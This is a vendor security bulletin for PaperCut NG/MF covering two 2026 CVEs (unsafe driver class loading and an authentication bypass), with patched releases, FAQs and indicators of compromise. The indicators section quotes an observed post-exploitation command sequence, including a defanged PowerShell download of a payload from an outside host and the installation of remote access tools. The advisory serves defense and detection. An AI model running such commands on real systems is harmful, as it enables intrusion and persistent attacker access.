-
Help Center home
-
Product manuals
-
Release notes
-
System requirements
Contents
URGENT Security Advisory: PaperCut NG/MF Security Bulletin (27 Aug 2026)
Last updated September 10, 2026
Contents
URGENT Security Advisory
PaperCut Software security response team is investigating active exploitation of a vulnerability affecting PaperCut NG and PaperCut MF.
Security maintenance releases are now available and are the recommended build for all customers. We are aware of confirmed customer incidents and continue to treat this matter with the highest priority. We will update this security bulletin as verified information becomes available.
Security Maintenance Release
PaperCut NG/MF 26.0.5, 25.0.13 and 24.1.10 are now available.
These are Regular Maintenance Releases (MR) that have gone through complete QA testing. They contain all of the security fixes issued in Emergency Patch Releases 1, 2 and 3, plus additional security hardening, and they have been through our standard release testing process. Release notes are published with the release.
These releases replace the emergency patches. If you are running an emergency patch build, move to a maintenance release. If you have not yet patched, upgrade now.
Download below and follow the standard upgrade procedure. These releases are also available from the upgrade page and the standard download pages.
PaperCut MF
MF Version | Download links | Checksums (SHA256) |
v26.0.5 |
| 1927e72be3937f1271e590331c7d5e450716dd99982867a20fa73da156c26a40 |
| 6c3f048664c3df6463aa1e56e22f3b6f3fa6ea210c632b0f26cf8e0c6c7b618c | |
| 9d07cd7498bbc293ccb74d64a03db3ab72debc3b30dd26fe1927486c204987a4 | |
v25.0.13 |
| 3b5fcba66aea7058c2aa4488d0f46beb6c7249c8c82464260358ad93859a8f77 |
| b9e9d925a0a75904d67d1a6cddc3ec02319232245c9a4b61e42a4e6bf572c31c | |
| eae8dbfa90f140fbb18390daa8948ac4894359c0da47d46e286ffd3539366a1d | |
v24.1.10 |
| da7fe675436dee598fdf9d42ec1762159d7638e7385bc80f64ade8a0c6f3dab1 |
| bd48fc3b1283e225db926bc25e24973f1fb4011aca7137f80166ef8c7ee18ecd | |
| 975b7f6bac85f5ce6c8b97b736656d604fd7bd3cffd768725075d301336833c2 |
PaperCut NG
NG Version | Download links | Checksums (SHA256) |
v26.0.5 |
| d9008b88cdfe4fcb32d5e338ed9ee08690e882509fc849cd52cc946bffdc9f69 |
| 6041b3feefc06a79addb42cfeb3a95f637b148cf3337280cece6ef8aa42675da | |
| 519c9fc16fd15b1a9e7bcd7b186d8168a3b0c6bafea35888d220ddf5a548fdaf | |
v25.0.13 |
| 39c4c4c264f76acff8d43988de2a7a3ea2f26c2c91291ceae8d253a9ea139035 |
| f21311fa3833a80d8d16bdc9516004fc9c3f834b0077e4a1f8fd550d10d7b8e1 | |
| bfc8c8d779521a17391b8872fd8def9803f5268f5bdc33eac41849429b05c101 | |
v24.1.10 |
| 1a9850c341b38edb5de6616739613c57e4c9ecb90f4c4385958b95e5356f83f9 |
| 0a9e283ef29733933412483c893cba42d95654170d0bfde82d58b4f8935bdcf2 | |
| 94e60ab7b850dc68b0b5bf3d7735e3c5c3f6e9b2889f92079a198ef954138345 |
Before and after upgrading:
- Review the release notes for your product and version, linked in the tables above, before you upgrade.
- Are you using an external database for Card/ID number lookups? Review the FAQ below.
- Using Site Servers? Review the FAQ below.
Post Install Check:
- Are you using an external database for Card/ID number lookups? Review the FAQ below.
- Using site-servers? Review the FAQ below.
Security issues addressed
Our security team has now made public the following two CVE’s.
| CVE | Notes | CVSS rating and vector |
| CVE-2026-82078 Unsafe Dynamic Class Loading in Database Connector | An unsafe dynamic class loading vulnerability exists in the database connection utilities of PaperCut MF and PaperCut NG. The application instantiates database driver classes based on configurable driver names without validating against an allowlist of approved drivers. Vulnerability Type: CWE-470 Use of Externally-Controlled input to select classes or code ('unsafe reflection'). Impact: If an attacker can manipulate system configuration parameters, this enables the execution of arbitrary Java bytecode residing on the application classpath under the security context of the PaperCut server process. Mitigated in: PaperCut NG/MF Emergency Patch (see above Release 3). | 9.4 (CRITICAL)
|
| CVE-2026-81578 Authentication Bypass | An improper access control vulnerability exists in the web management interface of PaperCut MF and PaperCut NG. Under specific conditions, unauthenticated remote requests targeting administrative functions can trigger backend actions prior to the completion of access validation checks. Vulnerability Type: CWE-306 Missing authentication for critical function. Impact: This allows an unauthenticated remote attacker to modify certain system configurations. Mitigated in: PaperCut NG/MF Emergency Patch (see above Release 3). | 8.8 (HIGH)
|
Who is potentially impacted
This advisory applies to all versions of:
- PaperCut NG
- PaperCut MF
Indicators of compromise and investigation guidance
The following may be indicators of compromise:
-
Alerts from intrusion-detection, endpoint-security, or network-monitoring tools involving the PaperCut Application Server, particularly suspicious post-exploitation activity from
pc-app.exe. -
Missing, unexpectedly truncated, or deleted PaperCut
server.logfiles. -
Any of the following entries in server.log:
ERROR No suitable driver found for jdbc:no:xERROR DatabaseUtils - Database error looking up cardID: VALUES CAST
Additional indicators of compromise [updated 30 August 2026, 3:35pm (AEST)]:
We are aware of the following additional indicators of compromise.
Strings in server.log:
DB URL: jdbc:derby:memory:pwn;create=trueDatabase error looking up cardID: VALUES CAST(X'cafebabeDatabase error looking up cardID: VALUES CAST('DB URL: jdbc:no:x DB Driver: <5-char random name>
Files written to disk:
<install>\server\lib\<5-char-name>.class<install>\server\data\content\<5-char-name>.cmd<install>\server\data\content\<5-char-name>.out
Note that these files may be cleaned up by the attacker as activity progresses, so their absence does not rule out compromise.
As every customer environment is unique, it is difficult to identify a single consistent pattern of post-compromise activity, but observed behaviour includes the pc-app.exe (or pc-app) process launching child shell processes (cmd.exe) and running whoami & ver, with endpoint protection in some cases preventing further execution and isolating the machine.
Where execution was not prevented, the following command sequence was observed, shown as elapsed time from the first command (starting at 00:00:00) rather than wall-clock time (URLs below are defanged with hxxp and [.] to prevent accidental execution; replace with http/. before using in detection tooling or blocklists):
00:00:00 whoami & ver
00:01:19 tasklist
00:04:42 nltest /dclist:
00:06:09 quser & dir c:\users
00:16:07 powershell Invoke-WebRequest -Uri hxxps://sendit[.]sh/Gg7Rp/ace[.]exe -OutFile C:\ProgramData\ace.exe
00:18:07 dir c:\programdata /a
00:19:27 c:\programdata\ace.exe /S
00:21:29 Windows Service "Remote Access Service" installed (SimpleHelp agent, C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\restricted\SimpleService.exe, running as LocalSystem, set to auto-start)
00:21:41 tasklist
00:27:37 powershell Invoke-WebRequest -Uri hxxps://download[.]anydesk[.]com/AnyDesk.exe -OutFile C:\ProgramData\AnyDesk.exe
We recommend checking for the presence of a Windows service named “Remote Access Service” running SimpleService.exe from the path above, and for unexpected AnyDesk installations, as potential indicators of post-compromise remote access tooling.
Important: The absence of the above indicators is not confirmation that a system has not been affected. PaperCut will publish validated, specific indicators and further guidance here as soon as they are available.
[Update: 10 September 2026 2:00pm (AEST)]
Third-party researchers have also published indicators of compromise, including this analysis from GreyNoise. We have not verified these independently and they do not come from reports made to us, so validate anything you act on against your own environment
Current Status
Update | Details |
Security maintenance releases published | PaperCut NG/MF 26.0.5, 25.0.13 and 24.1.10 are now available. These are the latest PaperCut NG/MF maintenance releases containing security improvements, including addressing all CVEs mentioned in this Security Advisory. The release has gone through full QA, and all customers are encourage to upgrade irrespective if there server is on the public internet or not. These releases replace the emergency patches. If you are running an emergency patch build, move to a maintenance release. If you have not yet patched, upgrade now. Downloads are below, and these releases are also available from the upgrade page and the standard download pages. Release notes are published with the release. |
Updates from the field | Reports of new compromises have slowed considerably over the past week, and the majority of customers now have their Application Server either behind a firewall or on a patched build. Thank you. Servers that remain publicly reachable and unpatched continue to be targeted, and post-compromise behaviour observed in the second wave has been more sophisticated than in the first days of this incident. Reminder that the PaperCut support team are here to help customer with any questions or concerns. |
FAQs
Q Is this an official release?
Yes. Unlike the emergency patches, these are These are Regular Maintenance Releases (MR) that have gone through complete QA testing. They carry new version numbers, ship with published release notes, and are available from the Portal and the standard download pages alongside any other release.
Q How do I apply the maintenance release?
Download above and follow the standard upgrade procedure.
Q I am on an emergency patch. Do I need the maintenance release?
Yes, though not urgently if you are on Emergency Patch Release 3 you are protected against the issues described in this advisory and can schedule this upgrade normally. The maintenance releases deliver the same protection through our standard release process, with additional hardening, published release notes and a new version number. If you are on Release 1 or 2, upgrade now.
Q Do I need to update other components (e.g. Site Servers, Secondary servers, User Client)?
Site Servers and secondary/print servers should be updated to a patched version, not just the primary Application Server.
Mobility Print and Print Deploy server components are not affected and do not need to be updated.
Our client software (including the User Client, Print Deploy client, and Mobility Print installer) is not affected and does not require an update.
Q What should I do if I suspect my server has been compromised?
If you suspect your server has been compromised, we recommend securing current server backups, completely wiping and rebuilding the Application Server, and restoring a clean backup taken before any suspicious behavior was detected. Additionally, you should activate your organization's security response procedures and follow standard incident protocols.
Our insight into individual environments is limited, so we cannot confirm or assess the full scope of impact from a compromised server.
Q My install uses an external database for card number lookups, what changes are required?
This is a rarely used feature and most customers will not need to take any action, for those that do please see the user manual for instructions on the required changes.
Q I applied the patch and added security.card-number-lookup.enabled=Y to server/security.properties, but card lookups are still failing
If you use SQL Server for external card lookups and the legacy Sourceforge jTDS driver, we recommend updating to the latest supported Microsoft SQL JDBC driver (see the manual).
This is best practice but may not resolve every case. If lookups are still failing, contact your reseller or PaperCut Support.
Q Will there be a release for NG/MF 23 and earlier?
There are no emergency patches or maintenance releases for version 23 or earlier. To get to a patched build you will need to upgrade to a currently supported version line (24, 25 or 26), each of which has a patched release available.
Until you are able to upgrade, treat the mitigation in the Immediate action required section above as essential: restrict web access to your Application Server to trusted addresses only.
For help planning the upgrade, see the upgrade page or contact your PaperCut Reseller or PaperCut Support.
Q Does the vulnerability affect PaperCut Hive/Pocket?
No, this security bulletin and the outlined vulnerability does not apply to PaperCut Hive or PaperCut Pocket.
Q My license has expired, or I'm in the process of renewing. What should I do?
Please don't let that hold up your upgrade. If your Application Server is reachable from the internet, moving to a supported, patched version is the priority.
Get in touch with PaperCut Support and we will help you work through it. Where it is needed we can issue an emergency temporary license, so that licensing is not what stands between you and a patched server.
Q I have upgraded but the security notice is still showing in the product. Why?
The emergency patch builds all reported the same version number as the unpatched release they were based on, so the in-product notice could not distinguish a patched server from an unpatched one. Installing a maintenance release resolves this, as those carry new version numbers. If you are on an emergency patch build and the notice is still displayed, you are protected against the issues described in this advisory; the notice will clear when you move to a maintenance release.
Q Who is contributing to PaperCut's response?
The security community's response to this incident has been a genuinely collaborative effort. PaperCut would like to thank Huntress, watchTowr, and a number of independent security advisors, as well as customers' Digital Forensics and Incident Response teams, who have all worked alongside us to share information.
Q Can you tell me more about what’s going on?
The advisory is kept very factual and it's aim is to provides customers with the information they need. Our CEO and Co-founder has written a blog post to open the window on what’s happening.
Superseded information
The following information applied during the emergency patch period in late August and early September. They are kept for reference.
Release Information
[Update: 1 September 2026 6:22pm (AEST)]
Emergency Patch (Release 3) has been released by our emergency response team and supersedes Release 2. You do not need to install previous patches, this patch is an accumulation of all emergency releases. This release addresses two known regressions and adds additional hardening and mitigation against potential attack chains. Regressions include:
- Addresses broken SAML login flows
- Restored support for using legacy Microsoft SQL Server drivers for external card lookup
We recommend all customers with internet-facing Application Servers install Release 3 as soon as possible, even if they have already applied an earlier emergency release.
Download and follow the standard upgrade procedure.
[Update: 28 August 2026 8:42pm (AEST)]
Following further work with our internal security team and external researchers, including Huntress and watchTowr, we have released an updated Emergency Patch (Release 2) that includes additional hardening beyond the original emergency patch. We recommend all customers install Release 2, even if you have already applied the original emergency patch.
Immediate action required
If your PaperCut NG/MF Application Server is accessible from the public internet, immediately restrict web access to trusted IP addresses only (e.g. internal IP addresses).
Use firewall rules, network access controls, or equivalent measures to ensure the PaperCut server’s web interfaces cannot be reached from untrusted internet addresses. Take this action now, even if you have not observed suspicious activity.
FAQs
Q Do I need to restrict access to my Mobility Print ports?
No. Mobility Print runs on a separate, unaffected architecture and is not impacted, so you can leave Mobility Print ports open.
Q What does Release 3 change compared to Release 2?
This release addresses two known regressions and adds additional hardening and mitigation against potential attack chains. Regressions include:
Addresses broken SAML login flows
Restored support for using legacy Microsoft SQL Server drivers for external card lookupEmergency Patch Release 3 adds further hardening that closes off additional attack vectors we have observed being exploited in the wild. It does not change the guidance on Card/ID number lookups or other configuration steps from Emergency Patch Release 2.
Q I already applied Release 2, do I need to apply Release 3?
Yes, you should install Release 3 following the standard upgrade process.
You do not need to install previous patches, this patch is an accumulation of all emergency releases.
Q My install uses an external database for card number lookups, what changes are required?
This is a rarely used feature and most customers will not need to take any action, for those that do, follow these steps:
Add security.card-number-lookup.enabled=Y to server/security.properties and restart the Application Server.
The default setting for this feature is off (N) which disables the feature. Without this key set, PaperCut NG/MF will silently ignore any external user lookup calls even though the Admin UI may still show the feature as configured.
Security notifications
To stay informed about high impact security updates please subscribe to our Security notifications sign-up form.
Updates
Date | Update/action |
27 August 2026 (AEST) | Published the initial Security Bulletin. |
27 August 2026, 8:00pm (AEST) | Minor wording updates. |
27 August 2026, 9:02pm (AEST) | Investigation update posted. |
28 August 2026, 02:10am (AEST) | Published emergency patch. Patch released for PaperCut NG/MF v25 and v26. |
28 August 2026, 10:43am (AEST) | Additional information added for customers using Card/ID number lookups from an external database. |
28 August 2026, 08:42pm (AEST) | Published Emergency Patch Release 2 which includes additional hardening developed with internal security and external researchers. Added guidance on required PaperCut would like to thank Huntress and watchTowr for their ongoing security analysis, helping to harden Release 2. |
28 August 2026, 10:08pm (AEST) | Published Emergency Patch Release 2 for PaperCut NG/MF v24. |
29 August 2026, 10:53am (AEST) | Additional FAQ added. |
29 August 2026, 04:35pm (AEST) | Added note about external database Card/ID number lookup feature and SAML investigation. |
29 August 2026, 08:48pm (AEST) | Additional FAQ added. |
30 August 2026, 10:34am (AEST) | Added Current Status update on ongoing development and support availability. Added FAQ with additional advice for customers using external database Card/ID number lookup feature. |
30 August 2026, 03:35pm (AEST) | Added additional indicators of compromise. |
31 August 2026, 4:21pm (AEST) | Status update posted. No new information to report. |
1 September 2026, 11:18am (AEST) | Additional FAQ added and component FAQ updated with clarification. |
1 September 2026, 02:10pm (AEST) | Added build numbers to download links. |
1 September 2026, 6:22pm (AEST) | Published Emergency Patch Release 3. This release addresses two known regressions (SAML and legacy Microsoft SQL Server support) and adds additional hardening and mitigation against potential attack chains. |
1 September 2026, 11:00pm (AEST) | Fixed an incorrect link in the FAQs. |
2 September 2026, 4:38pm (AEST) | Added Updates from the field to Current Status to show external observations. |
3 September 2026, 4:55pm (AEST) | Status update posted. No new information to report; work continues towards the official release. |
4 September 2026, 2:48pm (AEST) | Status update posted. No new information to report; work continues towards the official release. |
5 September 2026, 10:30am (AEST) | No new information to report; work continues towards the official release. |
7 September 2026, 5:18pm (AEST) | No new information to report; work continues towards the official release. |
8 September 2026, 4:40pm (AEST) | No new information to report; work continues towards the official release. |
9 September 2026, 2:00pm (AEST) | Advised that maintenance release will be published on 10 September 2026 at approximately 2:00pm AEST. Additional FAQs added. |
10 September 2026, 2:00pm (AEST) | Published security maintenance releases. FAQs updated. Added a link to third-party reporting in the indicators of compromise section. |
10 September 2026, 3:54pm (AEST) | Updated FAQs to point to the configuration changes referenced in the manual. |
Category: Security Bulletins
Subcategory: Security and Privacy
Comments
Comments are not available in this preview environment. On papercut.com, this space shows the live Disqus comment thread for this page.